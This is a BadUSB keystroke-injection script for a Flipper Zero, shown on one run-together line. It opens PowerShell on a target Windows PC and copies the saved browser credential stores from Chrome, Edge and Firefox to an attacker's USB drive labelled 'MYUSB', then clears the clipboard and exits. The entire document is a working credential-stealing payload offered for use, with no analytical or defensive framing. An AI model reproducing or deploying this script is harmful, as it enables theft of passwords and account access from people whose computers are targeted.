REM This script was created by REM Harvests all credentials from chrome, edge, and firefox REM This script requires a secondary USB named "MYUSB" to save credentials to REM The extracted data will require decryption REM REM Set delay for Flipper Zero DELAY 1000 REM REM Open PowerShell without elevated privileges GUI r DELAY 500 STRING powershell DELAY 500 ENTER DELAY 1000 REM REM Check if the USB drive exists STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter; STRING if ($usbDrive -ne $null) { ENTER DELAY 500 STRING cd $usbDrive; ENTER DELAY 500 STRING mkdir BrowserData; ENTER DELAY 500 STRING cd BrowserData; ENTER DELAY 500 REM REM Copy Chrome Login Data to USB STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; } ENTER DELAY 500 REM REM Copy Firefox Login Data to USB STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\"; STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; } ENTER DELAY 500 REM REM Copy Edge Login Data to USB STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data"; STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; } ENTER DELAY 500 STRING } ENTER DELAY 500 REM REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC) STRING echo off | clip ENTER DELAY 500 REM REM Close PowerShell STRING exit ENTER DELAY 500 REM Check out my other badusb scripts on